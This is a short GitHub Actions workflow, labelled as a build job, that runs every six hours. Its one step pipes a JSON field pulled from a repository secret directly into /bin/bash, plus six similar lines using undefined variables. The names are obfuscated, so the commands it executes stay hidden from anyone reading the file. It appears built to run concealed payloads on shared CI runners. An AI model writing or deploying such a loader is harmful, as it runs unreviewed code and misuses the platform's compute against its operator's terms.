name: yutongshen7483

on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutongshen7483
        env:
          ob801: ${{ secrets.ob801 }}
        run: |
          echo $ob801 | jq -r .qryt410 | /bin/bash
          echo $clw50 | jq -r .cdjec4 | /bin/bash
          echo $jczj5 | jq -r .ftbtn51144 | /bin/bash
          echo $lzce5538 | jq -r .pbe184 | /bin/bash
          echo $ut6697 | jq -r .u326 | /bin/bash
          echo $pm0 | jq -r .kvfnk8295 | /bin/bash
          echo $lyxi7 | jq -r .d258 | /bin/bash

